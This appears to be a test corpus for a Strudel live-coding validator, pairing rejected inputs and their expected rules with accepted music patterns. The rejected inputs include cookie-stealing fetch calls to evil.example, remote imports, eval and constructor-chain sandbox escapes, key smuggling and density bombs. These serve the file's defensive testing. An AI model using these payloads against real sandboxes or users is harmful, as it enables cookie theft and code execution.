// Security corpus for the validator: code that must be rejected (with the rule we expect) and
// idiomatic code that must be accepted, compiled and analysed. Ported from the research prototype
// (scratch-validator/test-security.mjs: 78 malicious, 34 legit) plus the design review's bypasses.

/** [code, expected rule, what it attacks] */
export const MALICIOUS: [string, string, string][] = [
  // direct globals
  ['fetch("https://evil.example/?c=" + document.cookie)', 'denied', 'network + cookie'],
  ['window.location = "https://evil.example"', 'syntax', 'navigation by assignment'],
  ['globalThis.process.exit(1)', 'denied', 'globalThis'],
  ['eval("alert(1)")', 'denied', 'eval'],
  ['Function("return this")()', 'denied', 'Function constructor'],
  ['import("https://evil.example/x.js")', 'syntax', 'dynamic import'],
  ['\\u0065val("1")', 'denied', 'unicode-escaped eval'],
  ['s("bd").fast(setTimeout)', 'denied', 'timer global'],
  ['self.postMessage(1)', 'denied', 'self'],
  // prototype-chain escapes
  ['s("bd").constructor.constructor("return process")()', 'denied', 'constructor chain'],
  ['s("bd")["constructor"]["constructor"]("return 1")()', 'syntax', 'computed member'],
  ['s("bd").__proto__', 'denied', '__proto__'],
  ['sine.range.call(null, 1, 2)', 'denied', 'Function.prototype.call'],
  ['note("c").fast.bind(null)', 'denied', 'Function.prototype.bind'],
  ['s("bd").every(2, x => x.constructor)', 'denied', 'constructor inside arrow'],
  // Strudel code-exec / network sinks
  ['s("bytebeat").bbexpr("t*(t>>5)")', 'denied', 'bytebeat Function()'],
  ["note(\"c\").s('bytebeat').byteBeatExpression('t')", 'denied', 'bytebeat Function()'],
  ['s("bd").worklet("fetch(1)")', 'denied', 'kabelsalat Function()'],
  ['worklet("x")', 'denied', 'kabelsalat Function()'],
  ['s("saw").K(saw(110).out())', 'denied', 'kabelsalat DSL'],
  ['s("bd").set({ workletSrc: "fetch(1)" })', 'denied', 'hap key smuggling'],
  ['s({ value: "bd", workletSrc: "fetch(1)" })', 'denied', 'hap key smuggling'],
  ['pure({ s: "bd", byteBeatExpression: "t" })', 'denied', 'hap key smuggling'],
  ['note("c").set(pure("t").as("workletSrc"))', 'denied', 'as() key smuggling'],
  ['compileKabel("fetch(1)")', 'denied', 'kabelsalat compiler'],
  ['initHydra({ src: "https://evil.example/h.js" })', 'denied', 'remote module import'],
  ['setSoundfontUrl("https://evil.example")', 'denied', 'soundfont eval host'],
  ['samples("https://evil.example/strudel.json")', 'denied', 'remote sample map'],
  ['evaluate("fetch(1)")', 'denied', 'evaluate'],
  ['register("x", (a, b) => b)', 'denied', 'registry mutation'],
  ['s("bd").onTrigger(h => h)', 'denied', 'raw callback'],
  ['s("bd").onTriggerTime(h => h)', 'denied', 'window.setTimeout callback'],
  ['s("bd").fmap(v => v)', 'denied', 'raw callback'],
  ['s("bd").withValue(v => v)', 'denied', 'raw callback'],
  ['s("bd").withHap(h => h)', 'denied', 'raw callback'],
  ['useRNG("precise")', 'denied', 'global RNG'],
  ['hush()', 'denied', 'REPL control'],
  ['s("bd").speak("en")', 'denied', 'speech synthesis'],
  ['s("bd").log()', 'denied', 'logging callback'],
  ['s("bd").draw(x => x)', 'denied', 'draw callback'],
  ['s("bd").pianoroll()', 'denied', 'visuals'],
  ['s(tidal`bd sd`)', 'syntax', 'tagged template'],
  ['s(`bd ${fetch("x")}`)', 'syntax', 'template expression the transpiler drops'],
  ['s("bd").fast(2 in s)', 'syntax', 'in operator'],
  // statements / control flow / mutation
  ['while (true) {}', 'syntax', 'infinite loop'],
  ['for (;;) {}', 'syntax', 'infinite loop'],
  ['function f() {}\ns("bd")', 'syntax', 'function declaration'],
  ['class X {}\ns("bd")', 'syntax', 'class'],
  ['var x = 1\ns("bd")', 'syntax', 'var'],
  ['let x = s("bd"); x = fetch; x', 'syntax', 'reassignment'],
  ['const f = x => f(x)\nf(1)', 'unknown-function', 'recursion'],
  ['s("bd").fast(new Array(9e5))', 'syntax', 'allocation'],
  ['this.s', 'syntax', 'this'],
  ['s("bd")?.fast(2)', 'syntax', 'optional chaining'],
  ['s(...["bd"])', 'syntax', 'spread'],
  ['s("bd").fast(1e308 * 10)', 'number', 'huge number'],
  ['s(/bd/)', 'syntax', 'regex'],
  ['s("bd").fast(2n)', 'syntax', 'bigint'],
  ['s("bd").every(2, async x => x)', 'syntax', 'async arrow'],
  ['s("bd").every(2, x => { return x })', 'syntax', 'block arrow'],
  ['s("bd").every(2, function (x) { return x })', 'syntax', 'function expression'],
  ['s("bd").every(2, (x = fetch()) => x)', 'syntax', 'default parameter'],
  ['s("bd"), fetch("x")', 'syntax', 'comma expression'],
  ['s("bd").fast(true ? 1 : 2)', 'syntax', 'conditional'],
  ['s("bd") || fetch()', 'syntax', 'logical operator'],
  ['s("bd").fast(typeof s)', 'syntax', 'typeof'],
  ['s({ ["work" + "letSrc"]: "x" })', 'syntax', 'computed key'],
  ['s({ get s() { return "bd" } })', 'syntax', 'getter'],
  ['s("bd").x', 'unknown-method', 'unknown member'],
  ['const process = 1\ns("bd")', 'denied', 'binding a global name'],
  ['const fetch = 1\ns("bd")', 'denied', 'binding a global name'],
  ['label: { s("bd") }', 'syntax', 'label'],
  ['setcps(fetch("x"))\ns("bd")', 'denied', 'tempo + network'],
  ['s("bd").fast(setcps(1))', 'denied', 'tempo'],
  ['debugger; s("bd")', 'syntax', 'debugger'],
  ['try { s("bd") } catch (e) {}', 'syntax', 'try'],
  ['"x".repeat(1e7)', 'unknown-method', 'string allocation'],
  ['s("bd").' + 'fast(2)'.padEnd(1300, ' '), 'size', 'over-long code'],

  // design-review bypasses and hardening
  ['backgroundImage("https://evil.example/leak.png")', 'denied', 'DOM write + exfiltration (core/ui.mjs)'],
  ['cleanupUi()', 'denied', 'DOM write'],
  ['s("bd").src((t, v) => v)', 'denied', 'superdough source() callback'],
  ['s("bd").set({ source: 1 })', 'denied', 'source hap key'],
  ['s("bd*4").fast("<0!16 1>".mul(50000).add(1))', 'density', 'late density bomb (patterned fast)'],
  ['s("hh*16").ply("<1!16 64>")', 'density', 'late density bomb (patterned ply)'],
  ['s("hh*16").lastOf(100, x => x.ply(16).ply(16))', 'density', 'chained constants behind a late condition'],
  ['s("hh*16").echoWith(12, 1/16, x => x.ply(2))', 'density', 'exponential echoWith'],
  ['applyN(16, x => x.ply(2), s("bd"))', 'denied', 'exponential applyN'],
  ['s("hh*16").segment(sine.range(1, 1000))', 'density', 'patterned segment'],
  ['s("bd").fast(2, 50000)', 'syntax', 'extra args become a patterned sequence'],
  ['s("bd").slow(0.001)', 'density', 'slow < 1/16 is fast'],
  ['s("bd").linger(0.001)', 'density', 'linger loops a sliver'],
  ['s("bd").ribbon(0, 0.001)', 'density', 'ribbon loops a sliver'],
  ['s("bd").zoom(0, 1000)', 'density', 'zoom plays 1000 cycles per bar'],
  ['n(run(1000)).s("sine")', 'density', 'huge run'],
  ['s("[bd*16]*16")', 'density', 'mini worst case'],
  ['s("bd*<1 128>")', 'density', 'patterned mini factor'],
  ['s("bd/0.001")', 'density', 'mini slow below 1/16'],
  ['s("bd(3,64)")', 'density', 'mini euclid steps'],
  ['s("{bd sd}%128")', 'density', 'mini polymeter steps'],
  ['s("bd").pace(1000)', 'denied', 'experimental stepwise density'],
  ['polymeter(s("a b c d e f g"), s("a b c d e f g h"))', 'denied', 'lcm density'],
  ['s("bd").FX(room(1))', 'denied', 'per-hap effect chains'],
  ['FX(s("bd"))', 'denied', 'per-hap effect chains'],
  ['s("bd").lfo({ c: "postgain", da: 20 })', 'denied', 'modulator bypassing the fader'],
  ['s("bd").env(1)', 'denied', 'modulator'],
  ['Snare: s("sd")', 'syntax', 'capital-S solo label'],
  ['S1: s("sd")', 'syntax', 'solo label'],
  ['$: s("bd")', 'syntax', 'anonymous label'],
  ['s("bd").duckorbit(2)', 'denied', 'engine-owned sidechain'],
  ['s("bd").duck(2)', 'denied', 'engine-owned sidechain'],
  ['s("bd").duckattack(60)', 'denied', 'engine-owned sidechain'],
  ['s("bd").orbit(3)', 'denied', 'engine-owned orbit'],
  ['s("bd").o(3)', 'denied', 'engine-owned orbit alias'],
  ['s("bd").set({ orbit: 5 })', 'denied', 'engine-owned key'],
  ['s("bd").set({ cps: 3 })', 'denied', 'tempo key'],
  ['s("bd").ch(3)', 'denied', 'channel routing'],
  ['s("bd").nudge(0.2)', 'denied', 'timing'],
  ['s("bd").color("red")', 'denied', 'UI styling'],
  ['s("bd").hsl(0.5, 0.5, 0.5)', 'denied', 'UI styling'],
  ['s("bd").analyze(1)', 'denied', 'engine-owned analyser'],
  ['s("bd").whenKey("a", x => x.fast(2))', 'denied', 'reads the keyboard'],
  ['s("bd").gain(mouseX)', 'denied', 'reads the pointer'],
  ['s("bd").timeline(1)', 'denied', 'client-dependent timeline'],
  ['calculateSteps(false)', 'denied', 'global switch'],
  ['registerVoicings("x", {})', 'denied', 'global voicing registry'],
  ['setcpm(30)\ns("bd")', 'denied', 'tempo'],
  ['s("bd").filter(h => true)', 'denied', 'raw callback'],
  ['withSeed(x => x, s("bd"))', 'denied', 'raw seed callback'],
  ['s("bd").gain(ref(() => 1))', 'denied', 'live accessor'],
  ['s("bd").gain(signal(t => t))', 'denied', 'raw time callback'],
  ['m("bd sd", 0)', 'denied', 'transpiler internal'],
  ['s("bd").p("x")', 'denied', 'REPL label'],
  ['s("bd").tag("x")', 'denied', 'engine-owned context'],
  ['s("bd").apply(x => x)', 'denied', 'Function.prototype.apply collision'],
  ['s("bd").toString()', 'denied', 'prototype access'],
  ['s("bd").every(2, x => x.fmap(v => v))', 'denied', 'raw callback inside arrow'],
  ['(x => x)(s("bd"))', 'syntax', 'IIFE'],
  ["note('c3 e3').s('sawtooth')", 'quotes', 'single-quoted mini'],
  ["'c e g'.fast(2)", 'quotes', 'method on a plain string'],
  ['s("bd") // mini-off', 'syntax', 'mini-off comment'],
  ['s("bd").midi()', 'denied', 'MIDI output'],
  // knob misuse
  ['s("bd").lpf(knob(cut))', 'knob', 'knob name not a string literal'],
  ['s("bd").lpf(knob("cut", "x"))', 'knob', 'knob with two arguments'],
  ['s("bd").lpf(knob("nope"))', 'knob-undeclared', 'undeclared knob'],
  ['s("bd").every(2, knob)', 'knob', 'knob as a value'],
  ['s("bd").fast(knob("cut"))', 'density', 'knob as a density factor'],
];

/** Idiomatic parts that must validate, compile and analyse (knob "cut" is declared). */
export const LEGIT: string[] = [
  // prototype corpus (project prompt, CLAUDE.md, client, strudel.cc idioms)
  's("bd(3,8)")',
  's("hh*8").mask("<1!6 0!2>").gain(0.4)',
  's("cp").struct("[~!7 x]")',
  'note("<c2 eb2 g2>").s("sawtooth").lpf(400)',
  's("swpad:3").slow(8).room(0.8).delay(0.3)',
  'note("<[c4 e4] [e4 g4] [g4 c5]>").s("triangle").decay(0.3)',
  'note("c3").s("white").lpf(2000)',
  'stack(s("breaks:2*4"), note("c2 e2 g2").s("sine").lpf(400))',
  'stack(\n  note("c2").s("sine").gain(0.08).lpf(sine.range(200,800).fast(3)).room(0.5),\n  note("c4").s("triangle").gain(0.04).lpf(sine.range(400,2000).fast(7)).room(0.3)\n).slow(2)',
  'stack(\n  s("bd*4").bank("RolandTR909"),\n  s("~ cp").bank("RolandTR909").room(0.2),\n  s("hh*8").gain("[.4 .8]*4").bank("RolandTR909")\n)',
  'n("0 2 4 <[6,8] [7,9]>").scale("C4:minor").s("sawtooth").lpf(sine.range(400, 2000).slow(8)).lpq(8).attack(0.01).release(0.2)',
  'note("c2 [eb2 g2]").s("supersaw").detune(0.3).lpf(600).lpenv(4).room(0.4)',
  'chord("<Cm7 Fm7 G7 Cm7>").voicing().s("gm_epiano1").room(0.6).gain(0.5)',
  'n("<0 3 5 7>*8").scale("D:dorian").s("triangle").off(1/8, x => x.transpose(12).gain(0.4)).delay(0.25)',
  's("bd sd:2 [~ bd] sd").sometimes(x => x.speed(2)).every(4, x => x.fast(2))',
  'note("c3 eb3 g3 bb3").s("gm_acoustic_bass").legato(0.8).jux(rev)',
  'n(run(8)).scale("A:minor:pentatonic").s("piano").degradeBy(0.3).palindrome()',
  'n("0 2".add("<0 5 7>")).scale("E:phrygian").s("square").lpf(1200).decay(0.2).sustain(0)',
  'note("c3").s("sine").vib(4).vibmod(0.2).gain(perlin.range(0.3, 0.7))',
  's("breaks:0").fit().chop(16).cut(1).sometimesBy(0.3, x => x.speed(-1))',
  'n("0 .. 7").scale("C:major").s("sawtooth").arp("0 2 1 3").euclidLegato(5, 8)',
  'const drums = stack(s("bd(3,8)"), s("~ sd"))\nconst bass = note("<c1 f1>").s("sawtooth").lpf(300)\nstack(drums, bass)',
  's("hh*16").gain(saw.range(0.2, 0.8).fast(2)).pan(sine.slow(4))',
  'n("<0 2 4>".add.squeeze("0 7")).scale("C:major").s("sawtooth")',
  'n("0 1 2 3").s("jazz").begin(0.25).end(0.5).speed("<1 2>")',
  'note("g2*8").s("sawtooth").lpf(tri.range(300, 3000).slow(8)).lpq(12).shape(0.4).crush(8)',
  'stack(s("bd*2, ~ sd"), note("c2").s("sbd"), s("white*8").decay(0.05).sustain(0).gain(0.2))',
  'note("c4 d4 e4 g4").s("gm_flute").sometimesBy(0.5, x => x.late(1/16)).room(0.5).size(0.9)',
  'n("[0 4 7]!2 [2 5 9]").scale("F:lydian").s("gm_string_ensemble_1").slow(2).attack(0.5).release(2)',
  's("<bd sd>*4").ply(2).rarely(x => x.hpf(2000))',
  's("bd").every(2, fast(2))',
  'note("c2").s("sawtooth").lpf("<400 800 1600>").lpenv("<2 4>").ftype("ladder")',
  'note("c3 e3 g3").fast(2).rev().iter(4).superimpose(x => x.transpose(7).slow(2))',
  'n("0 7").scale("C:minor").s("pulse").pw(sine.range(0.1, 0.9)).within(0, 0.5, x => x.fast(2))',
  // the rebuild's idioms
  's("sbd*4")\n  .decay(0.35)\n  .gain(0.9)',
  'n("<0 3 5 2>")\n  .scale("D2:dorian")\n  .s("sawtooth")\n  .lpf(knob("cut"))\n  .lpenv(2)\n  .decay(0.2)\n  .sustain(0.3)\n  .gain(0.6)',
  "s(\"bd*4\").lpf(knob('cut'))",
  'n("0 2 4 7").scale("<D:dorian G:mixolydian>").s("triangle")',
  's("hh*8").fast("2")',
  's(`bd [~ bd] sd ~`)',
  's("hh*16").lastOf(4, x => x.ply(2))',
  'n("0 [2 4]").scale("C:minor").s("square").echoWith(3, 1/8, x => x.transpose(12).gain(0.5))',
  'const up = x => x.transpose(12)\nn("0 2").scale("C:major").s("sine").every(2, up)',
  'n("0 2 4".add.out("<0 3>")).scale("C:major").s("sine")',
  'chord("<Dm9 G13 C^7>").voicing().s("gm_epiano1").release(0.5)',
  's("bd sd").bank("tr909")',
  's("white*16")\n  .bpf(sine.range(600, 4000).fast(1))\n  .decay(0.04)\n  .gain(0.3)',
  'n("0 2 4 6").scale("C:minor").s("wt_digital").seed(3).degradeBy(0.2)',
  's("hh*8").euclidRot(5, 8, 2).pan(rand)',
  'note("c3 e3 g3").s("gm_epiano1").pickF("<0 1>", [x => x, x => x.fast(2)])',
];
